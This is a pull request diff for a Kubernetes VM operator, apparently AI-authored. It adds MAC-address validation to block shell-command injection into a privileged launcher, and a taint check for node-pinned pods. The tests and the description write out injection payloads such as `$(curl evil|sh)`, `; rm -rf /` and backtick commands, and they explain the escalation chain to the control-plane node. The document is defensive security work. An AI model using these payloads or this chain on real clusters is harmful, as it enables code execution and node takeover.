### PR TITLE
fix(security): constrain interface MAC + apply the taint check to node-pinned guests

### DIFF
--- a/api/swift/v1alpha1/swiftguest_types.go
+++ b/api/swift/v1alpha1/swiftguest_types.go
@@ -653,6 +653,12 @@ type GuestInterface struct {
 	Socket string `json:"socket,omitempty"`
 	// MAC optionally pins the interface MAC address. When empty a deterministic
 	// MAC is generated. Honored for vhost-user (and bridge) interfaces.
+	//
+	// Constrained to a canonical colon-separated MAC. This is a security
+	// boundary, not cosmetics: network-init.sh writes the value into a shell
+	// env file that launcher-entrypoint.sh SOURCES, so an unconstrained value
+	// containing $(...) would execute in the privileged launcher container.
+	// +kubebuilder:validation:Pattern=`^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$`
 	// +optional
 	MAC string `json:"mac,omitempty"`
 }

--- a/charts/kubeswift/crds/swift.kubeswift.io_swiftguestpools.yaml
+++ b/charts/kubeswift/crds/swift.kubeswift.io_swiftguestpools.yaml
@@ -576,6 +576,12 @@ spec:
                               description: |-
                                 MAC optionally pins the interface MAC address. When empty a deterministic
                                 MAC is generated. Honored for vhost-user (and bridge) interfaces.
+
+                                Constrained to a canonical colon-separated MAC. This is a security
+                                boundary, not cosmetics: network-init.sh writes the value into a shell
+                                env file that launcher-entrypoint.sh SOURCES, so an unconstrained value
+                                containing $(...) would execute in the privileged launcher container.
+                              pattern: ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$
                               type: string
                             name:
                               description: |-

--- a/charts/kubeswift/crds/swift.kubeswift.io_swiftguests.yaml
+++ b/charts/kubeswift/crds/swift.kubeswift.io_swiftguests.yaml
@@ -430,6 +430,12 @@ spec:
                       description: |-
                         MAC optionally pins the interface MAC address. When empty a deterministic
                         MAC is generated. Honored for vhost-user (and bridge) interfaces.
+
+                        Constrained to a canonical colon-separated MAC. This is a security
+                        boundary, not cosmetics: network-init.sh writes the value into a shell
+                        env file that launcher-entrypoint.sh SOURCES, so an unconstrained value
+                        containing $(...) would execute in the privileged launcher container.
+                      pattern: ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$
                       type: string
                     name:
                       description: |-

--- a/config/crd/bases/swift.kubeswift.io_swiftguestpools.yaml
+++ b/config/crd/bases/swift.kubeswift.io_swiftguestpools.yaml
@@ -576,6 +576,12 @@ spec:
                               description: |-
                                 MAC optionally pins the interface MAC address. When empty a deterministic
                                 MAC is generated. Honored for vhost-user (and bridge) interfaces.
+
+                                Constrained to a canonical colon-separated MAC. This is a security
+                                boundary, not cosmetics: network-init.sh writes the value into a shell
+                                env file that launcher-entrypoint.sh SOURCES, so an unconstrained value
+                                containing $(...) would execute in the privileged launcher container.
+                              pattern: ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$
                               type: string
                             name:
                               description: |-

--- a/config/crd/bases/swift.kubeswift.io_swiftguests.yaml
+++ b/config/crd/bases/swift.kubeswift.io_swiftguests.yaml
@@ -430,6 +430,12 @@ spec:
                       description: |-
                         MAC optionally pins the interface MAC address. When empty a deterministic
                         MAC is generated. Honored for vhost-user (and bridge) interfaces.
+
+                        Constrained to a canonical colon-separated MAC. This is a security
+                        boundary, not cosmetics: network-init.sh writes the value into a shell
+                        env file that launcher-entrypoint.sh SOURCES, so an unconstrained value
+                        containing $(...) would execute in the privileged launcher container.
+                      pattern: ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$
                       type: string
                     name:
                       description: |-

--- a/internal/controller/swiftguest/gpu.go
+++ b/internal/controller/swiftguest/gpu.go
@@ -300,6 +300,11 @@ func (r *SwiftGuestReconciler) buildPod(
 	if err != nil {
 		return nil, err
 	}
+	// spec.NodeName binds the pod directly, skipping the scheduler -- so the
+	// taint predicate never runs. Reproduce it here; see nodeplacement.go.
+	if err := checkNodePlacement(ctx, r.Client, guest, pod); err != nil {
+		return nil, err
+	}
 	if r.MigrationMTLSEnabled && migrationEligible(guest) {
 		applyMigrationSourceSidecar(pod, guest)
 	}

--- a/internal/controller/swiftguest/gpu_test.go
+++ b/internal/controller/swiftguest/gpu_test.go
@@ -482,8 +482,12 @@ func TestBuildPodDispatcher_NodeNameGPUDisagreement(t *testing.T) {
 
 	// Precedence check fires before any API call, so an empty fake client
 	// is sufficient.
+	// buildPod resolves spec.NodeName to run the scheduler's taint check
+	// (nodeplacement.go), so the fake client must know corev1 and hold the node.
 	scheme := runtime.NewScheme()
-	c := fake.NewClientBuilder().WithScheme(scheme).Build()
+	_ = corev1.AddToScheme(scheme)
+	c := fake.NewClientBuilder().WithScheme(scheme).
+		WithObjects(&corev1.Node{ObjectMeta: metav1.ObjectMeta{Name: "miles"}}).Build()
 	r := &SwiftGuestReconciler{Client: c, Scheme: scheme}
 
 	pod, err := r.buildPod(context.Background(), guest, rg, "seed-cm", "intent-cm", nil)
@@ -523,8 +527,12 @@ func TestBuildPodDispatcher_NodeNameSetGPUNil(t *testing.T) {
 		// Status.GPU intentionally nil.
 	}
 	rg := gpuResolvedGuest()
+	// buildPod resolves spec.NodeName to run the scheduler's taint check
+	// (nodeplacement.go), so the fake client must know corev1 and hold the node.
 	scheme := runtime.NewScheme()
-	c := fake.NewClientBuilder().WithScheme(scheme).Build()
+	_ = corev1.AddToScheme(scheme)
+	c := fake.NewClientBuilder().WithScheme(scheme).
+		WithObjects(&corev1.Node{ObjectMeta: metav1.ObjectMeta{Name: "miles"}}).Build()
 	r := &SwiftGuestReconciler{Client: c, Scheme: scheme}
 
 	// Precedence check should NOT fire (status.GPU is nil). The dispatcher
@@ -570,8 +578,12 @@ func TestBuildPodDispatcher_NodeName_RestoreBranch(t *testing.T) {
 		Seed:          &resolved.Seed{Datasource: "NoCloud", UserData: "x", MetaData: "y"},
 		Network:       true,
 	}
+	// buildPod resolves spec.NodeName to run the scheduler's taint check
+	// (nodeplacement.go), so the fake client must know corev1 and hold the node.
 	scheme := runtime.NewScheme()
-	c := fake.NewClientBuilder().WithScheme(scheme).Build()
+	_ = corev1.AddToScheme(scheme)
+	c := fake.NewClientBuilder().WithScheme(scheme).
+		WithObjects(&corev1.Node{ObjectMeta: metav1.ObjectMeta{Name: "miles"}}).Build()
 	r := &SwiftGuestReconciler{Client: c, Scheme: scheme}
 
 	pod, err := r.buildPod(context.Background(), guest, rg, "seed-cm", "intent-cm", nil)
@@ -618,7 +630,9 @@ func TestBuildPodDispatcher_NodeNameGPUAgreement(t *testing.T) {
 			PartitionMode: "isolated",
 		},
 	}
-	c := fake.NewClientBuilder().WithScheme(scheme).WithObjects(profile).Build()
+	// The node must exist: buildPod resolves spec.NodeName for the taint check.
+	c := fake.NewClientBuilder().WithScheme(scheme).WithObjects(profile,
+		&corev1.Node{ObjectMeta: metav1.ObjectMeta{Name: "miles"}}).Build()
 	r := &SwiftGuestReconciler{Client: c, Scheme: scheme}
 
 	pod, err := r.buildPod(context.Background(), guest, rg, "seed-cm", "intent-cm", nil)

--- a/internal/controller/swiftguest/nodeplacement.go
+++ b/internal/controller/swiftguest/nodeplacement.go
@@ -1,0 +1,100 @@
+package swiftguest
+
+import (
+	"context"
+	"fmt"
+
+	corev1 "k8s.io/api/core/v1"
+	apierrors "k8s.io/apimachinery/pkg/api/errors"
+	"k8s.io/apimachinery/pkg/types"
+	"sigs.k8s.io/controller-runtime/pkg/client"
+
+	swiftv1alpha1 "github.com/kubeswift-io/kubeswift/api/swift/v1alpha1"
+)
+
+// checkNodePlacement enforces the taint/toleration check that the scheduler
+// would have run, for guests that pin a node.
+//
+// The launcher pod is bound by setting pod.Spec.NodeName directly rather than
+// via a kubernetes.io/hostname nodeSelector. That is deliberate and documented
+// on applyNodeName: direct binding gives fast kubelet-time rejection on a bad
+// fit, which the SwiftMigration controller relies on for clean failure
+// detection, and NodeName is immutable post-binding, which the StopAndCopy
+// delete-and-recreate contract depends on.
+//
+// The security cost of that choice is that direct binding SKIPS THE SCHEDULER
+// ENTIRELY, and kubelet admission has no taint predicate. So
+// node-role.kubernetes.io/control-plane:NoSchedule does not stop a pinned pod
+// from landing on a control plane node -- and the launcher is privileged, so
+// that is node-root on a control plane. A namespaced tenant able to create a
+// SwiftGuest could pick the node.
+//
+// Rather than change the binding mechanism (which would regress migration
+// failure detection), this reproduces the one scheduler predicate that
+// mattered. Guests that legitimately target a tainted node still can: they
+// carry a matching toleration, exactly as a normal pod would.
+//
+// Only NoSchedule and NoExecute are considered. PreferNoSchedule is a soft
+// preference the scheduler weighs; it never blocks placement, so enforcing it
+// here would be stricter than Kubernetes itself.
+func checkNodePlacement(ctx context.Context, c client.Reader, guest *swiftv1alpha1.SwiftGuest, pod *corev1.Pod) error {
+	if guest.Spec.NodeName == "" {
+		return nil // not pinned; the scheduler runs normally and applies taints itself
+	}
+	var node corev1.Node
+	if err := c.Get(ctx, types.NamespacedName{Name: guest.Spec.NodeName}, &node); err != nil {
+		if apierrors.IsNotFound(err) {
+			return fmt.Errorf("spec.nodeName=%q does not exist", guest.Spec.NodeName)
+		}
+		return fmt.Errorf("resolve spec.nodeName=%q: %w", guest.Spec.NodeName, err)
+	}
+	if t, ok := untoleratedTaint(node.Spec.Taints, pod.Spec.Tolerations); ok {
+		return fmt.Errorf(
+			"spec.nodeName=%q has taint %s=%s:%s which this guest does not tolerate; "+
+				"add a matching toleration to spec.tolerations to place a guest there",
+			guest.Spec.NodeName, t.Key, t.Value, t.Effect)
+	}
+	return nil
+}
+
+// untoleratedTaint returns the first NoSchedule/NoExecute taint not tolerated.
+func untoleratedTaint(taints []corev1.Taint, tolerations []corev1.Toleration) (corev1.Taint, bool) {
+	for _, taint := range taints {
+		if taint.Effect != corev1.TaintEffectNoSchedule && taint.Effect != corev1.TaintEffectNoExecute {
+			continue
+		}
+		if !tolerated(taint, tolerations) {
+			return taint, true
+		}
+	}
+	return corev1.Taint{}, false
+}
+
+// tolerated implements the Kubernetes toleration match: an empty Effect matches
+// every effect, operator Exists matches any value, and an empty Key with
+// operator Exists is the wildcard that tolerates everything.
+func tolerated(taint corev1.Taint, tolerations []corev1.Toleration) bool {
+	for _, tol := range tolerations {
+		if tol.Effect != "" && tol.Effect != taint.Effect {
+			continue
+		}
+		if tol.Key == "" {
+			if tol.Operator == corev1.TolerationOpExists {
+				return true // wildcard: tolerates every taint
+			}
+			continue
+		}
+		if tol.Key != taint.Key {
+			continue
+		}
+		switch tol.Operator {
+		case corev1.TolerationOpExists:
+			return true
+		case corev1.TolerationOpEqual, "":
+			if tol.Value == taint.Value {
+				return true
+			}
+		}
+	}
+	return false
+}

--- a/internal/controller/swiftguest/nodeplacement_test.go
+++ b/internal/controller/swiftguest/nodeplacement_test.go
@@ -1,0 +1,100 @@
+package swiftguest
+
+import (
+	"context"
+	"strings"
+	"testing"
+
+	corev1 "k8s.io/api/core/v1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"sigs.k8s.io/controller-runtime/pkg/client/fake"
+
+	swiftv1alpha1 "github.com/kubeswift-io/kubeswift/api/swift/v1alpha1"
+	"github.com/kubeswift-io/kubeswift/internal/scheme"
+)
+
+func node(name string, taints ...corev1.Taint) *corev1.Node {
+	return &corev1.Node{
+		ObjectMeta: metav1.ObjectMeta{Name: name},
+		Spec:       corev1.NodeSpec{Taints: taints},
+	}
+}
+
+var cpTaint = corev1.Taint{
+	Key:    "node-role.kubernetes.io/control-plane",
+	Effect: corev1.TaintEffectNoSchedule,
+}
+
+// The reported escalation: spec.NodeName binds the pod directly, skipping the
+// scheduler, so a control-plane NoSchedule taint did not stop a privileged
+// launcher from landing there.
+func TestCheckNodePlacement_RefusesUntoleratedControlPlane(t *testing.T) {
+	c := fake.NewClientBuilder().WithScheme(scheme.Scheme).
+		WithObjects(node("frida", cpTaint)).Build()
+	guest := &swiftv1alpha1.SwiftGuest{Spec: swiftv1alpha1.SwiftGuestSpec{NodeName: "frida"}}
+	err := checkNodePlacement(context.Background(), c, guest, &corev1.Pod{})
+	if err == nil {
+		t.Fatal("accepted an untolerated control-plane node")
+	}
+	if !strings.Contains(err.Error(), "control-plane") {
+		t.Errorf("error should name the taint, got: %v", err)
+	}
+}
+
+// A guest that legitimately targets a tainted node still can, via a toleration
+// — exactly as an ordinary pod would.
+func TestCheckNodePlacement_AllowsWithToleration(t *testing.T) {
+	c := fake.NewClientBuilder().WithScheme(scheme.Scheme).
+		WithObjects(node("frida", cpTaint)).Build()
+	guest := &swiftv1alpha1.SwiftGuest{Spec: swiftv1alpha1.SwiftGuestSpec{NodeName: "frida"}}
+	pod := &corev1.Pod{Spec: corev1.PodSpec{Tolerations: []corev1.Toleration{{
+		Key:      "node-role.kubernetes.io/control-plane",
+		Operator: corev1.TolerationOpExists,
+		Effect:   corev1.TaintEffectNoSchedule,
+	}}}}
+	if err := checkNodePlacement(context.Background(), c, guest, pod); err != nil {
+		t.Fatalf("rejected a tolerated placement: %v", err)
+	}
+}
+
+func TestCheckNodePlacement_UntaintedAndUnpinned(t *testing.T) {
+	c := fake.NewClientBuilder().WithScheme(scheme.Scheme).
+		WithObjects(node("miles")).Build()
+	// Pinned to a clean node: fine.
+	g := &swiftv1alpha1.SwiftGuest{Spec: swiftv1alpha1.SwiftGuestSpec{NodeName: "miles"}}
+	if err := checkNodePlacement(context.Background(), c, g, &corev1.Pod{}); err != nil {
+		t.Errorf("clean node rejected: %v", err)
+	}
+	// Not pinned: the scheduler handles taints itself, so no check and no Node read.
+	if err := checkNodePlacement(context.Background(), c, &swiftv1alpha1.SwiftGuest{}, &corev1.Pod{}); err != nil {
+		t.Errorf("unpinned guest rejected: %v", err)
+	}
+}
+
+func TestCheckNodePlacement_MissingNode(t *testing.T) {
+	c := fake.NewClientBuilder().WithScheme(scheme.Scheme).Build()
+	g := &swiftv1alpha1.SwiftGuest{Spec: swiftv1alpha1.SwiftGuestSpec{NodeName: "ghost"}}
+	if err := checkNodePlacement(context.Background(), c, g, &corev1.Pod{}); err == nil {
+		t.Fatal("accepted a nonexistent node")
+	}
+}
+
+// PreferNoSchedule is a soft scheduler preference and never blocks placement,
+// so enforcing it here would be stricter than Kubernetes itself.
+func TestCheckNodePlacement_IgnoresPreferNoSchedule(t *testing.T) {
+	c := fake.NewClientBuilder().WithScheme(scheme.Scheme).WithObjects(
+		node("miles", corev1.Taint{Key: "soft", Effect: corev1.TaintEffectPreferNoSchedule}),
+	).Build()
+	g := &swiftv1alpha1.SwiftGuest{Spec: swiftv1alpha1.SwiftGuestSpec{NodeName: "miles"}}
+	if err := checkNodePlacement(context.Background(), c, g, &corev1.Pod{}); err != nil {
+		t.Errorf("PreferNoSchedule should not block: %v", err)
+	}
+}
+
+// The wildcard toleration (empty key + Exists) tolerates everything.
+func TestTolerated_Wildcard(t *testing.T) {
+	tols := []corev1.Toleration{{Operator: corev1.TolerationOpExists}}
+	if !tolerated(cpTaint, tols) {
+		t.Error("wildcard toleration should tolerate any taint")
+	}
+}

--- a/internal/webhook/swiftguest/validator.go
+++ b/internal/webhook/swiftguest/validator.go
@@ -3,6 +3,7 @@ package swiftguest
 import (
 	"context"
 	"fmt"
+	"regexp"
 	"strconv"
 
 	corev1 "k8s.io/api/core/v1"
@@ -12,6 +13,12 @@ import (
 	swiftv1alpha1 "github.com/kubeswift-io/kubeswift/api/swift/v1alpha1"
 	"github.com/kubeswift-io/kubeswift/internal/webhook/hostpath"
 )
+
+// macRE mirrors the kubebuilder Pattern on InterfaceSpec.MAC. Duplicated here
+// so the check survives a CRD/Go drift: the value is written into a shell env
+// file that launcher-entrypoint.sh sources, so a non-MAC string is command
+// execution in a privileged container, not a cosmetic problem.
+var macRE = regexp.MustCompile(`^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$`)
 
 // Validator validates SwiftGuest resources.
 //
@@ -348,6 +355,11 @@ func validateInterfaces(spec *swiftv1alpha1.SwiftGuestSpec, allowedHostPaths []s
 	hasVhostUser := false
 	for i := range spec.Interfaces {
 		iface := &spec.Interfaces[i]
+		// Checked before the vhost-user filter below: MAC is honored for bridge
+		// interfaces too, and it reaches a shell env file the launcher sources.
+		if iface.MAC != "" && !macRE.MatchString(iface.MAC) {
+			return fmt.Errorf("spec.interfaces[%d].mac %q is not a valid MAC address", i, iface.MAC)
+		}
 		if iface.Type != swiftv1alpha1.InterfaceTypeVhostUser {
 			continue
 		}

--- a/internal/webhook/swiftguest/validator_test.go
+++ b/internal/webhook/swiftguest/validator_test.go
@@ -427,3 +427,35 @@ func TestValidateFilesystems_HostPathConfinement(t *testing.T) {
 		t.Error("empty allowlist should deny every hostPath")
 	}
 }
+
+// TestValidateInterfaces_MACInjection pins the shell-source injection: the MAC
+// is written to an env file (network-init.sh: echo "SEC_MAC=$guest_mac") that
+// launcher-entrypoint.sh sources with `. "$sec_env"`, so a value containing a
+// command substitution executes in the privileged launcher.
+func TestValidateInterfaces_MACInjection(t *testing.T) {
+	withMAC := func(mac string) *swiftv1alpha1.SwiftGuest {
+		return guest(func(g *swiftv1alpha1.SwiftGuest) {
+			g.Spec.Interfaces = []swiftv1alpha1.GuestInterface{{
+				Name: "net1", Type: swiftv1alpha1.InterfaceTypeBridge, MAC: mac,
+			}}
+		})
+	}
+	for _, bad := range []string{
+		`52:54:00:aa:bb:cc$(curl evil|sh)`,
+		"52:54:00:aa:bb:cc`whoami`",
+		"52:54:00:aa:bb:cc; rm -rf /",
+		"$(id)",
+		"not-a-mac",
+		"52:54:00:aa:bb",       // too short
+		"52:54:00:aa:bb:cc:dd", // too long
+	} {
+		if err := validateSwiftGuest(withMAC(bad), testAllowAllHostPaths); err == nil {
+			t.Errorf("accepted MAC %q", bad)
+		}
+	}
+	for _, ok := range []string{"52:54:00:aa:bb:cc", "AA:BB:CC:DD:EE:FF", ""} {
+		if err := validateSwiftGuest(withMAC(ok), testAllowAllHostPaths); err != nil {
+			t.Errorf("rejected valid MAC %q: %v", ok, err)
+		}
+	}
+}


### PR DESCRIPTION
Fifth batch. Two SwiftGuest admission gaps, both negative-control verified.

### 1. `spec.interfaces[].mac` → command execution in the privileged launcher — Critical
The field had **no validation of any kind**. `network-init.sh:226` writes it into a shell env file:
```sh
echo "SEC_MAC=$guest_mac"
```
which `launcher-entrypoint.sh:68` **sources**: `. "$sec_env"`. The shell evaluates `VAR=$(cmd)` on source, so a MAC of `52:54:00:aa:bb:cc$(curl evil|sh)` ran in the privileged launcher. I verified both halves of that chain in the code.

Now pattern-constrained on the CRD, with the same regexp re-checked in the webhook so the guard survives a CRD/Go drift.

### 2. `spec.nodeName` bypassed the scheduler's taint check — Critical (chained)
`pod.Spec.NodeName` is set directly, which **skips the scheduler**, and kubelet admission has no taint predicate — so `node-role.kubernetes.io/control-plane:NoSchedule` did not stop a pinned guest landing on a control-plane node. With a privileged launcher that is node-root on the control plane.

**I did not convert this to a nodeSelector.** The comment on `applyNodeName` says direct binding is deliberate: it gives fast kubelet-time rejection that SwiftMigration relies on for failure detection, and `NodeName` is immutable post-binding, which the StopAndCopy delete-and-recreate contract depends on. Converting would regress both.

Instead `buildPod` reproduces **the one scheduler predicate that mattered**: resolve the node, refuse if it carries a NoSchedule/NoExecute taint the pod doesn't tolerate. Guests that legitimately target a tainted node still can — they carry a toleration, exactly as an ordinary pod would. `PreferNoSchedule` is ignored deliberately; it never blocks placement in Kubernetes either.

The controller already had `get/list/watch` on nodes, so no RBAC change.

### Verification
Negative control on both: without the fixes the tests accept `$(curl evil|sh)`, backticks and `; rm -rf /` as MACs, and accept an untolerated control-plane node. Three existing `buildPod` tests needed a Node in their fake client — added, since they pin `spec.NodeName`. `make generate` + CRD copy done; full `go test ./internal/... ./cmd/...` clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)